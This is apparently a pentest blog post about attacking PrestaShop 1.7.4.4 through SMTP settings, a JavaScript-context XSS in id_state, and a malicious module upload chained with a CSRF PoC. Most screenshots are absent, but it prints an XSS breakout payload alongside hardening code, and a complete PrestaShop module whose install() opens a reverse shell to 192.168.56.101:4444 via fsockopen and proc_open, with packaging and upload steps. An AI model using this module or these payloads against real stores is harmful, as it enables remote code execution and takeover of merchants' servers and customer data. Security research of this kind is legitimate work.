Thursday, 9 April 2020

Creating evil module for PrestaShop

Yesterday I decided to take a look at PrestaShop 1.7.4.4 (the VM available from TurnKeyLinux). Below you'll find a few notes. Here we go...
Today we'll start here:


I was wondering how to prepare a 'working module' that would somehow connect us back to the PrestaShop server. (You'll find a similar story described here or here.) So this time I started from the admin panel, more precisely from Database -> SQL Manager:


Interestingly:


I decided it will be a good start of the journey. ;)

Next case: Advanced Parameters -> E-mail:


Well ;] The SMTP server and port fields on that page can point anywhere, so it was interesting enough to start a netcat listener on my Kali VM:

 
With a prepared response file fed to the listening port:


At this stage I was looking for those error messages in the source code:


I started somewhere here:


Next step:


Checking error message function(s):


Next step:


Learning more:


And I found it:


Next case: id_state vulnerable to XSS:


Quick response from PrestaShop:




As we can see, the injection lands directly in a JavaScript context, so I changed my payload, like this:


Now response looks better:
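As an added illustration, constructed for this write-up and not PrestaShop's code (the real source behind the id_state issue is not reproduced here), this is what a JavaScript-context reflection looks like in PHP: why an HTML payload such as `<script>alert(1)</script>` does nothing when the value lands inside a JS string literal, why a string-breakout payload does work, and how the fix differs from plain HTML escaping. The function names and the sample payload values are assumptions made for the example.

```php
<?php
// Constructed example (not PrestaShop code): a request parameter reflected
// straight into a JavaScript string literal, as on the page reported above.

function vulnerableSnippet(string $idState): string
{
    // Vulnerable: the value is dropped into a JS string literal without
    // any escaping. An HTML payload like <script>alert(1)</script> only
    // produces a syntax error inside the first <script> block, but
    // "12';alert(1);//" closes the literal and runs.
    return "<script>var idState = '" . $idState . "';</script>";
}

function hardenedIdSnippet(string $idState): string
{
    // id_state is a numeric key, so the simplest fix is typing, not escaping:
    // "12';alert(1);//" becomes the integer 12 and nothing else survives.
    $id = (int) $idState;
    return "<script>var idState = " . $id . ";</script>";
}

function hardenedStringSnippet(string $value): string
{
    // For values that must stay strings, emit a JSON literal with <, >, ', "
    // and & hex-escaped, so neither the HTML parser (looking for </script>)
    // nor the JS parser (looking for a quote) sees a delimiter.
    $js = json_encode(
        $value,
        JSON_HEX_TAG | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_HEX_AMP
    );
    return "<script>var value = " . $js . ";</script>";
}

// Constructed payloads: the first is the HTML-context attempt that fails in
// a JS string, the second is the breakout that succeeds.
$htmlPayload = '<script>alert(1)</script>';
$jsPayload   = "12';alert(1);//";

echo vulnerableSnippet($htmlPayload), PHP_EOL;   // does not execute
echo vulnerableSnippet($jsPayload), PHP_EOL;     // executes alert(1)
echo hardenedIdSnippet($jsPayload), PHP_EOL;     // only the integer is emitted
echo hardenedStringSnippet($jsPayload), PHP_EOL; // quote and slashes escaped
```

Running it shows the vulnerable output `var idState = '12';alert(1);//';`, the typed output `var idState = 12;` and the JSON form `var value = "12\u0027;alert(1);\/\/";`. The point for the write-up above is that a `<script>` or `<img onerror>` payload is the wrong tool inside a JS literal, and that `htmlspecialchars()` on its own is the wrong fix there too, because in its pre-PHP-8.1 default mode it leaves the single quote alone.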


Checking the source code again:

Next step:


There is a file_put_contents() call, so I was wondering if I could use it somehow:


Looking deeper:


More source to check:


So the idea was simple: we can upload 'any' compressed archive (zip/tar/tgz) as a PrestaShop module. So, to create an 'evil one', the easiest way is to download a valid existing module and rewrite it a little. I started here:


Simple modification:


Preparing upload:

Intercepting request with Burp:


All good - so?

Checking - and unfortunately my module wasn't added at all. ;[

I tried with another one called spiderbk:


Looks good. But why was I able to upload a zip module this time...?

Checking again:


It works again! I decided to compare both modules. The reason for my failure during the first upload, as far as I could tell, was that PrestaShop (in version 1.7) checks hash value(s) of the files in the module archive.

...and that's how I found this page (thanks!):


As you can see, there is a "Min Version" - we'll use it ;)


After uploading the ZIP file I tried to locate the file(s) of my new module on the server. This is what I found:

So far, so good. Next stage - prepare a working reverse shell:

The module is rewritten again, so we can upload it one more time (remember to start the netcat listener on your Kali VM first):
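To tie together the module structure, the "Min Version" field and the reverse-shell step, here is a minimal module in the shape PrestaShop 1.7 expects, written as an added example for this page: it is neither the module from the post nor code from PrestaShop or the spiderbk module. Assumptions: the module is called `evilmod` (directory `evilmod/`, file `evilmod.php`, class `Evilmod`), the listener is at 192.168.56.101:4444, and the Module Manager installs the uploaded archive, which is what calls `install()`.

```php
<?php
// evilmod/evilmod.php -- constructed example module, not from the original post.
// PrestaShop looks for modules/<name>/<name>.php and instantiates class <name>,
// so the directory, the file and the class must all carry the same name.
if (!defined('_PS_VERSION_')) {
    exit;
}

class Evilmod extends Module
{
    // Assumed attacker listener: nc -lvnp 4444 on the Kali VM.
    const LHOST = '192.168.56.101';
    const LPORT = 4444;

    public function __construct()
    {
        $this->name = 'evilmod';            // must match directory and file name
        $this->tab = 'administration';
        $this->version = '1.0.0';
        $this->author = 'pentest';
        $this->need_instance = 0;
        // The "Min Version" from the module docs: declare a compliancy range
        // that covers the installed release, otherwise the module is rejected.
        $this->ps_versions_compliancy = array('min' => '1.7.0.0', 'max' => _PS_VERSION_);
        $this->bootstrap = true;

        parent::__construct();

        $this->displayName = $this->l('Evil module (pentest)');
        $this->description = $this->l('Proof of concept only.');
    }

    public function install()
    {
        // Runs once, when the module is installed after upload.
        $this->connectBack(self::LHOST, self::LPORT);
        return parent::install();
    }

    private function connectBack($host, $port)
    {
        $sock = @fsockopen($host, $port, $errno, $errstr, 5);
        if ($sock === false) {
            return false;            // listener not up: install continues normally
        }
        // Hand the socket to /bin/sh as stdin, stdout and stderr, so the
        // listener gets an interactive shell (the classic PHP one-liner).
        $descriptors = array(0 => $sock, 1 => $sock, 2 => $sock);
        $proc = proc_open('/bin/sh -i', $descriptors, $pipes);
        if (is_resource($proc)) {
            proc_close($proc);       // blocks until the shell exits
        }
        fclose($sock);
        return true;
    }
}
```

Pack it as evilmod.zip containing the evilmod/ directory and upload it through the Module Manager with the listener already running. Because `proc_close()` waits for the shell to exit, the admin's upload request hangs for as long as the session is open; that is the same behaviour as the PHP one-liner from the cheat sheets. The extracted files also end up under modules/evilmod/ below the web root, so a standalone PHP file in the archive could be triggered by requesting it directly instead of waiting for `install()`; which trigger fires first depends on the upload flow of the PrestaShop version in front of you, so check both.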


When the upload is done, we should be somewhere here:



The request that uploads the file...


... can be 'extracted' from Burp using "Engagement tools -> Generate CSRF PoC":


I saved the generated PoC to an HTML file on my disk. A caveat: the PoC replays the captured request exactly, including any token it carried, and browsers that default cookies to SameSite=Lax won't attach the admin session cookie to a cross-site POST, so test it in the browser your target actually uses:


Checking:


I think it's done. ;)

Remember to use it only for legal pentests!

See you next time!

Cheers
